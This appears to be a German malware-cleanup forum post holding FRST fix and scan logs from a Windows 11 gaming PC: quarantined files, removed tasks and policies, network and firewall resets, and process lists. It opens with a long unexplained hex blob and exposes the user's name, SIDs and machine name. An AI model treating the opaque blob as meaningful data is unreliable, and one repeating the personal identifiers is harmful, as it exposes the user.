c4494e9b1e3362540bbe941f705e1519767791d9d8b650f50b2d9cca0032815c191e6419dbc0cd1c0eb39a8ae65a754456363831c0e4449d7278c54af537911d7e01b04495c6ac35063a8f4a3032e82c4e71a9659bb16cbd743fb500b56de018142b84e58ceb28511abec94a7651e12c6c2a4071a5e1b1311aebad8e0566806455019424dfecec30747bbe01375c853d4a7bbc5583f9cc6570b49800d05eb0204b2dc87ddac7ecc11a3f95c1963a80256d231820a9d0a8194f33bf9ca067953c510670d9b5ba80a158b29943f66871ec4d04885dddbbd8dd67aacc42f47a29306916989d8dc404a574b3aa85f6760d206901992dacecb95972739fc1c6777520780cec85daee40415a76999d164598215f1d18e5d8c144e5017fbc03574419ac4d089541a4b7b4a95c73afc8f5499c50117f142d9cc7f83063ff89dbd074d9507102f041bac86841053ece8564396d2d63021c19bcbdb1297e7bcd86f06b61ac7606bdd998d7c85962bacf9e464a95357835788597c1a56974b287dd755ee5684936b8c19efe2cfd4eb2984c254f091d461b90b9bcdfb11c42e892c2555a61404e3a809d9edd784576f2a89c353e993d4a2dd07dbcbeb15505f3cdc99757e0286c179d1c95c5ec3d5f3c8783775ce934711eb0a5b6cbdcb100b7a989754f81a4631eb8ad89e3e8690efcc4dde468c54856194c6981c84c617c7b964ba77b81295e04c42c9afdd83852fcca4b776fe1ec66367cb1b5bfac2460fd9b8a4742f1e81e7f4869aeb67c21463ebb4c957f6d4c5109b049a7bcb42d67fc8f009774cd98137790e19aff74c1663d8406e05cbdec567744319fa26c4971b7cfdeb65f31b0102c0c39adc2443c54bdbfc3256dcd34780490b58eda28f152b5881cc03675246c3bed30a5bec43c42a8854dd44349a86c3d241c9ec164917c37870b465d4dec492d401ca0e4b52d553f9348b54175f4447691dd98ddd85d73f89b4a554a81b0710eb919bde8c89d553f969dd63609ac7f35c46188f6083d74f09986463b49a0161d8d39a7d0a92c79f293c4e47e9030693c9c19b9c9743844b38f06a74a0521122d85e9bdfcacd17237ab0ab76a4531750a00cddbd0541d7a2b98cdc4373dbc1e7e854daefcb02054f3be82b06f4dac5239851195c354f55cb08bc20567c93c76243849b7bdd5ed413d8a9cb55a0554712bed39defa40c14d3e8cdc9779814c6117e0a9a1c2dc2001bcb7cd9751b5d0523c102cdec624117e3ec883f477712c1003ed7d97d85c99403ca9cca63a9c441162e4398be5b5fd7c728cc3c5784584721b8d4195e7241d41fabb47d4669d84172e842ddaf6a5314fad89474669804d4500782c97c0f01d05aba800454a4d546b0c64459dc778ad47f4d00cf642197463628d2995c1bc7d5a37acdd7460e0bc10785c19bcdc08ed07fc92835576c919131ef031b0f704595ef4c40dc440593d450a8938aada042905baabc80565b0b0522d48a5a4ba20755fb39c48167e3d7c4e109d21d8e7a5557e3fb31cd77cb019462ebc24b9c768e54ef59008d74c45906a39bcc1c2bb387d51fb9e1df0484da84f7f24b9a0c424915f2a91c0e45c2958452184b9c2c9a029616aabc8c47769194e03b0c5bbbd543866a8bc9d9064ede45e08c845daf638e5457889c2d423bd484f3a4c1899fb207d6732888425678960481924add6d544511a378d43c665e5a074388d71d8bf383802bfa803277ce95c490df485acec2cd150b6949d5556353813080cb5aafba9594737881d074035bc0a0e68e5bec434a1027da981c04a4540660564dddccda0dd0fb48ec970669cd4430d892497d7a97d5beb844c7469b4a44202f099bde0545d54b397c6f65db5286d3e89d19de7dc21003bc443b76491e4760c81dd9ed9f4246ff0950c31749d9c170e7cb589eaa9e96276b20316635d740a0a9030ded5486d7b739284f05f15544015944189e95c314d3cbc89d737512971799d55bacce8a168b4a5cef742f93d72235045dfd90449437fb909843c95ec423ac43896d8ad2541f5c9c0d46689f4642ab0e580ea80654536ad037457d92d740acc3499f684f51ab7999c2544edc87508b011bac70819563bcc8b55431d6c443940c5d8dacc2d7235991d7066b0a475031ce5bacbb4a5013ab04a603e19241f18c8b5a4e46c7d7df3cbcb903e59f04b7cecb5dde9647d5c7ca882c75fe53c176289fdd8ffd0357ab7c58df56a9d4876084cd1aecbd5b54f74ccdc463e90704d1c9daddee5503d00bfa4cc372349384121541da3e4e43864becd832569fdbc6d7fd469becb4c9d55b3a4cc1739d9311f2b084cd9dfa9857f7a8986c438991052399d11a6fe8445663d8a81944285d06f0244919ef5c4bd74ea8b47676941fc113a1ce5bac5b4ad61bcad48075888c04b7c483da5df50557272a805d03af93d6978ecb1a3bf044978bf89ccd04a411c6b3bed259ec7b5ad057aab0dc742e135740099cda5c1049d7fb2a41c255e85ac4b03c838b5ec48997c7da45d775a4140662888309ece2c6d7fbf96c4463881a812059d31a0bcf81902749f82375d8cf04e02801dbbf9b59179378e0de677f9317d7de82489ebec346e3fa5c8164a0984170af439a9eca43058b88e449577c5a84b18952d8ccc85386fb8a245e449e07c6102301ddae308f568bec804174cdd740a368d2ca4feac854576aec2a45abd6051160034a5c66c410737b048057689904c0a4820a7e1b14571738c9ec53cb43d650bd061a1d7f8195a3aae09a56895b0623d9945b0e5b0ed51b39582a75f656c6f1c703098dda91942b3adc52762d974167890ed84ec74590e73a8cef062f1f47f1ec825d8c2a4f167fdad83b567717c6c0ebc4cdfc2c849647ececaa079c1e4423f5c4983f9689d56b78545b07f91300a79ed1ca9cadc916e73850cb540e1f0410d74859fbfccbd46f3938a167a59b46b23d0618abde4f17d72b1c676780520167c383da2e585ed61b58d03a768f1e8403e64e1b8c7bccd5cf09444d56790a8747ae42981ca68a958f5cb0df469d940440648a1dffda8bd0aa9c15b957aac   
========= Ende von CMD: =========   
VirusTotal: C:\Users\Pauli\AppData\Local\2613946761 => https://www.virustotal.com/gui/file/72c6a683dad9f1600186b269a195c641a6b430cab850b264e641e88af76b56a6/detection/f-72c6a683dad9f1600186b269a195c641a6b430cab850b264e641e88af76b56a6-1655738899 
C:\Users\Pauli\AppData\Local\1355515445 => erfolgreich verschoben 
C:\Users\Pauli\AppData\Local\2613946761 => erfolgreich verschoben 
C:\Users\Pauli\AppData\Local\3390820382 => erfolgreich verschoben 
C:\Users\Pauli\AppData\Local\4096968421 => erfolgreich verschoben 
"HKU\S-1-5-21-1424437550-2087844553-323541659-1001\Software\Microsoft\Windows\CurrentVersion\Run\\MicrosoftEdgeAutoLaunch_0394F9F0D5AFEC0304440CFD4BF5F89C" => erfolgreich entfernt 
HKLM\System\CurrentControlSet\Control\Session Manager\\"BootExecute"="autocheck autochk *" => Wert erfolgreich wiederhergestellt 
C:\Windows\system32\GroupPolicy\Machine => erfolgreich verschoben 
C:\Windows\system32\GroupPolicy\GPT.ini => erfolgreich verschoben 
C:\Windows\system32\GroupPolicy\User => erfolgreich verschoben 
C:\Windows\system32\GroupPolicyUsers\S-1-5-21-1424437550-2087844553-323541659-1001\User => erfolgreich verschoben 
C:\ProgramData\NTUSER.pol => erfolgreich verschoben 
HKLM\SOFTWARE\Policies\Google => erfolgreich entfernt 
HKLM\SOFTWARE\Policies\Microsoft\Edge => erfolgreich entfernt 
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{07595C2E-60C1-4CAA-90B7-43A07800F8DF}" => erfolgreich entfernt 
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{07595C2E-60C1-4CAA-90B7-43A07800F8DF}" => erfolgreich entfernt 
C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1652464033 => erfolgreich verschoben 
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Opera scheduled Autoupdate 1652464033" => erfolgreich entfernt 
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{5B8095A6-0C1E-4D17-A6BB-1C5756AAB167}" => erfolgreich entfernt 
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5B8095A6-0C1E-4D17-A6BB-1C5756AAB167}" => erfolgreich entfernt 
C:\Windows\System32\Tasks\MicrosoftEdgeUpdateTaskMachineCore => erfolgreich verschoben 
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftEdgeUpdateTaskMachineCore" => erfolgreich entfernt 
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A1411766-E2FC-47B4-9195-5EFB2B3C1F58}" => erfolgreich entfernt 
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A1411766-E2FC-47B4-9195-5EFB2B3C1F58}" => erfolgreich entfernt 
C:\Windows\System32\Tasks\MicrosoftEdgeUpdateTaskMachineUA => erfolgreich verschoben 
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftEdgeUpdateTaskMachineUA" => erfolgreich entfernt 
HKLM\System\CurrentControlSet\Services\edgeupdate => erfolgreich entfernt 
edgeupdate => Dienst erfolgreich entfernt 
HKLM\System\CurrentControlSet\Services\edgeupdatem => erfolgreich entfernt 
edgeupdatem => Dienst erfolgreich entfernt 
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\SDECon32 => erfolgreich entfernt 
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\SDECon64 => erfolgreich entfernt 
HKLM\Software\Classes\Drive\ShellEx\ContextMenuHandlers\SDECon32 => erfolgreich entfernt 
HKLM\Software\Classes\Drive\ShellEx\ContextMenuHandlers\SDECon64 => erfolgreich entfernt 
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\SDECon32 => erfolgreich entfernt 
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\SDECon64 => erfolgreich entfernt 
C:\Users\Pauli\Anwendungsdaten => ":d988fd1ce0beed92b2bcb751f85f2bf5" ADS erfolgreich entfernt 
"C:\Users\Pauli\AppData\Roaming" => ":d988fd1ce0beed92b2bcb751f85f2bf5" ADS nicht gefunden. 
C:\Users\Public\Shared Files => ":VersionCache" ADS erfolgreich entfernt   
========= Powershell: =========   
Set-MpPreference : Es wurde kein Parameter gefunden, der dem Parameternamen "RealTimeProtectionEnabled" entspricht. 
In C:\FRST\tmp000.ps1:22 Zeichen:18 
+ set-mppreference -RealTimeProtectionEnabled $true -force 
+                  ~~~~~~~~~~~~~~~~~~~~~~~~~~ 
    + CategoryInfo          : InvalidArgument: (:) [Set-MpPreference], ParameterBindingException 
    + FullyQualifiedErrorId : NamedParameterNotFound,Set-MpPreference 
  
Set-MpPreference : Es wurde kein Parameter gefunden, der dem Parameternamen "OnAccessProtectionEnabled" entspricht. 
In C:\FRST\tmp000.ps1:23 Zeichen:18 
+ set-mppreference -OnAccessProtectionEnabled $true -force 
+                  ~~~~~~~~~~~~~~~~~~~~~~~~~~ 
    + CategoryInfo          : InvalidArgument: (:) [Set-MpPreference], ParameterBindingException 
    + FullyQualifiedErrorId : NamedParameterNotFound,Set-MpPreference 
    
========= Ende von Powershell: =========     
========= ipconfig /flushdns =========     
Windows-IP-Konfiguration   
Der DNS-Aufl”sungscache wurde geleert.     
========= Ende von CMD: =========     
========= netsh winsock reset catalog =========     
Der Winsock-Katalog wurde zurckgesetzt. 
Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen.       
========= Ende von CMD: =========     
========= netsh advfirewall reset =========   
OK.       
========= Ende von CMD: =========     
========= netsh advfirewall set allprofiles state ON =========   
OK.       
========= Ende von CMD: =========     
========= netsh winhttp reset proxy =========     
Aktuelle WinHTTP-Proxyeinstellungen:   
    DirectAccess (kein Proxyserver).       
========= Ende von CMD: =========     
========= Bitsadmin /Reset /Allusers =========     
BITSADMIN version 3.0 
BITS administration utility. 
(C) Copyright Microsoft Corp.   
{A3D00BB7-8CBE-4227-865F-A7421C190757} canceled. 
{DF61D6F1-82F9-4628-A981-7D186C538BB6} canceled. 
2 out of 2 jobs canceled.     
========= Ende von CMD: =========     
========= Winmgmt /salvagerepository =========   
Das WMI-Repository ist konsistent.     
========= Ende von CMD: =========     
========= Winmgmt /resetrepository =========   
Das WMI-Repository wurde zurckgesetzt.     
========= Ende von CMD: =========     
========= winmgmt /resyncperf =========       
========= Ende von CMD: =========     
========= "%WINDIR%\SYSTEM32\lodctr.exe" /R =========     
Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.   
========= Ende von CMD: =========     
========= "%WINDIR%\SysWOW64\lodctr.exe" /R =========     
Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.   
========= Ende von CMD: =========     
========= "%WINDIR%\SYSTEM32\lodctr.exe" /R =========     
Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.   
========= Ende von CMD: =========     
========= "%WINDIR%\SysWOW64\lodctr.exe" /R =========     
Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.   
========= Ende von CMD: =========   
C:\Windows\System32\Drivers\etc\hosts => erfolgreich verschoben 
Hosts erfolgreich wiederhergestellt.   
========= RemoveProxy: =========   
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt 
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt 
"HKU\S-1-5-21-1424437550-2087844553-323541659-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt 
"HKU\S-1-5-21-1424437550-2087844553-323541659-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt     
========= Ende von RemoveProxy: =========     
=========== "C:\WINDOWS\SysWOW64\*.tmp" ==========   
nicht gefunden   
========= Ende -> "C:\WINDOWS\SysWOW64\*.tmp" ========     
=========== "C:\WINDOWS\System32\*.tmp" ==========   
nicht gefunden   
========= Ende -> "C:\WINDOWS\System32\*.tmp" ========     
=========== "C:\Windows\SystemTemp\*.tmp" ==========   
C:\Windows\SystemTemp\temB547.tmp => erfolgreich verschoben   
========= Ende -> "C:\Windows\SystemTemp\*.tmp" ========     
=========== EmptyTemp: ==========   
BITS transfer queue => 0 B 
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 12813842 B 
Java, Discord, Steam htmlcache => 606090666 B 
Windows/system/drivers => 4326649 B 
Edge => 0 B 
Firefox => 0 B 
Opera => 13493822 B   
Temp, IE cache, history, cookies, recent: 
Default => 0 B 
ProgramData => 0 B 
Public => 0 B 
systemprofile => 0 B 
systemprofile32 => 7600 B 
LocalService => 46962 B 
NetworkService => 240974 B 
Pauli => 1338297191 B   
RecycleBin => 2488 B 
EmptyTemp: => 1.8 GB temporäre Dateien entfernt.   
================================     
Das System musste neu gestartet werden.   
==== Ende von Fixlog 17:28:41 ====    
FRST Log:    Code:  
 Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 19-06-2022 
durchgeführt von Pauli (Administrator) auf PAULS_GAMING_PC (ASUS System Product Name) (20-06-2022 17:30:44) 
Gestartet von C:\Users\Pauli\Desktop 
Geladene Profile: Pauli 
Plattform: Microsoft Windows 11 Pro Version 21H2 22000.739 (X64) Sprache: Deutsch (Deutschland) 
Standard-Browser: Edge 
Start-Modus: Normal   
==================== Prozesse (Nicht auf der Ausnahmeliste) =================   
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)   
(C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe ->) (ASUSTeK COMPUTER INC. -> ) C:\Program Files (x86)\ASUS\ArmouryDevice\dll\SwAgent\ArmourySwAgent.exe 
(C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmourySocketServer.exe ->) (ASUSTeK COMPUTER INC. -> ASUS) C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmouryWebBrowserEdge.exe <4> 
(C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64\EpicWebHelper.exe <2> 
(C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7> 
(C:\Program Files\ASUS\ARMOURY CRATE Lite Service\ArmouryCrate.Service.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTeK COMPUTER INC.) C:\Program Files\ASUS\ARMOURY CRATE Lite Service\ArmouryCrate.UserSessionHelper.exe 
(C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.exe ->) (Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.CpuIdRemote64.exe 
(C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.exe ->) (Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.DisplayAdapter.exe 
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe 
(C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\Lively.exe ->) (rocksdanister) C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\Plugins\Cef\Lively.PlayerCefSharp.exe 
(C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\Lively.exe ->) (rocksdanister) C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\Plugins\Watchdog\Lively.Watchdog.exe 
(C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\Plugins\Cef\Lively.PlayerCefSharp.exe ->) (rocksdanister) C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\Plugins\Cef\CefSharp.BrowserSubprocess.exe <4> 
(Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\iCUE.exe 
(explorer.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe 
(explorer.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <10> 
(explorer.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\102.0.1245.44\msedgewebview2.exe <9> 
(explorer.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe 
(Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe 
(Salfeld Computer GmbH -> Salfeld Computer GmbH) C:\ProgramData\NFS\v3\NFSccsvc.exe 
(Salfeld Computer GmbH -> Salfeld Computer) C:\Windows\cc\CtlSysUI.exe 
(services.exe ->) (ASUSTeK Computer Inc. -> ) C:\Windows\System32\AsusUpdateCheck.exe 
(services.exe ->) (ASUSTeK COMPUTER INC. -> ASUS Inc.) C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe 
(services.exe ->) (ASUSTeK Computer Inc. -> ASUSTek COMPUTER INC.) C:\Program Files (x86)\ASUS\AsusCertService\AsusCertService.exe 
(services.exe ->) (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\2.01.13\AsusFanControlService.exe 
(services.exe ->) (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AXSP\4.02.12\atkexComSvc.exe 
(services.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTek COMPUTER INC.) C:\Program Files (x86)\ASUS\ROG Live Service\ROGLiveService.exe 
(services.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTek Computer Inc.) C:\Program Files (x86)\LightingService\LightingService.exe 
(services.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTeK COMPUTER INC.) C:\Program Files\ASUS\ARMOURY CRATE Lite Service\ArmouryCrate.Service.exe 
(services.exe ->) (Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.exe 
(services.exe ->) (Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\CueLLAccessService.exe 
(services.exe ->) (Corsair Memory, Inc. -> Corsair) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\iCUEDevicePluginHost.exe <8> 
(services.exe ->) (DTS, Inc. -> DTS Inc.) C:\Windows\System32\DTS\PC\APO4x\DtsApo4Service.exe 
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe 
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe 
(services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iastorvd.inf_amd64_fb9e356192ae1106\RstMwService.exe 
(services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_d8d8130c2588d45b\OneApp.IGCC.WinService.exe 
(services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_cad1db73e8c782a6\WMIRegistrationService.exe 
(services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\piecomponent.inf_amd64_0570478011758f12\Intel_PIE_Service.exe 
(services.exe ->) (Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_b5484efd38adbe8d\jhi_service.exe 
(services.exe ->) (Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub_updater.exe 
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.2001.0_x64__8wekyb3d8bbwe\gamingservices.exe 
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.2001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe 
(services.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\msiexec.exe 
(services.exe ->) (Microsoft Windows Hardware Compatibility Publisher -> Corsair Memory, Inc.) C:\Windows\System32\CorsairGamingAudioCfgService64.exe 
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MsMpEng.exe 
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\NisSrv.exe 
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <2> 
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispig.inf_amd64_647b4244e991951b\Display.NvContainer\NVDisplay.Container.exe <2> 
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_fdd83e4dd87bcfa1\RtkAudUService64.exe <2> 
(services.exe ->) (Salfeld Computer GmbH -> Salfeld Computer) C:\Windows\cc\ctlsysmgr.exe 
(services.exe ->) (Salfeld Computer GmbH -> Salfeld Computer) C:\Windows\cc\winctlsvc.exe 
(services.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\steamservice.exe 
(sihost.exe ->) (rocksdanister) C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\Lively.exe 
(svchost.exe ->) (ASUSTeK Computer Inc. -> ) C:\Program Files\ASUS\KINGSTON_Aac_DRAM\AacKingstonDramHal_x64.exe 
(svchost.exe ->) (ASUSTeK Computer Inc. -> ) C:\Program Files\ASUS\KINGSTON_Aac_DRAM\AacKingstonDramHal_x86.exe 
(svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUS) C:\Program Files (x86)\ASUS\ArmouryDevice\dll\AcPowerNotification\AcPowerNotification.exe 
(svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUS) C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmourySocketServer.exe 
(svchost.exe ->) (ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ArmouryDevice\dll\MBLedSDK\NoiseCancelingEngine.exe 
(svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTek Compputer Inc.) C:\Program Files\ASUS\AacMB\Aac3572MbHal_x86.exe <2> 
(svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe <6> 
(svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTeK Computer Inc.) C:\Program Files\ASUS\AacExtCard\extensionCardHal_x86.exe 
(svchost.exe ->) (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Program Files\ASUS\ASUS_Aac_DRAM\Aac3572DramHal_x64.exe 
(svchost.exe ->) (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Program Files\ASUS\ASUS_Aac_DRAM\Aac3572DramHal_x86.exe 
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.20970.0_x64__8wekyb3d8bbwe\HxTsr.exe 
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe 
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2> 
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe 
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe 
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\UUS\amd64\MoUsoCoreWorker.exe   
==================== Registry (Nicht auf der Ausnahmeliste) ===================   
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)   
HKLM\...\Run: [RtkAudUService] => C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_fdd83e4dd87bcfa1\RtkAudUService64.exe [1376856 2021-10-21] (Realtek Semiconductor Corp. -> Realtek Semiconductor) 
HKLM\...\Run: [CORSAIR iCUE 4 Software] => C:\Program Files\Corsair\CORSAIR iCUE 4 Software\iCUE Launcher.exe [182888 2022-03-17] (Corsair Memory, Inc. -> Corsair Memory, Inc.) 
HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4282328 2022-06-07] (Valve Corp. -> Valve Corporation) 
HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32653776 2022-06-18] (Epic Games Inc. -> Epic Games, Inc.) 
HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\Run: [MicrosoftEdgeAutoLaunch_0394F9F0D5AFEC0304440CFD4BF5F89C] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3595168 2022-06-16] (Microsoft Corporation -> Microsoft Corporation) 
GroupPolicyUsers\S-1-5-21-1424437550-2087844553-323541659-1001\User: Beschränkung <==== ACHTUNG 
Policies: C:\ProgramData\NTUSER.pol: Beschränkung <==== ACHTUNG   
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============   
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)   
Task: {1A18D701-DA9E-4B06-8BDF-AB747136C81E} - System32\Tasks\ASUS\ArmourySocketServer => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmourySocketServer.exe [1845272 2022-05-17] (ASUSTeK COMPUTER INC. -> ASUS) 
Task: {3F829885-9B4F-4912-8E83-10CF4230A961} - System32\Tasks\ASUS\AcPowerNotification => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\AcPowerNotification\AcPowerNotification.exe [305176 2022-05-17] (ASUSTeK COMPUTER INC. -> ASUS) 
Task: {47F77BB5-8DA2-4E86-83BD-DF4045E80C30} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) 
Task: {4AD1AD68-0494-4673-8E95-51875726705A} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) 
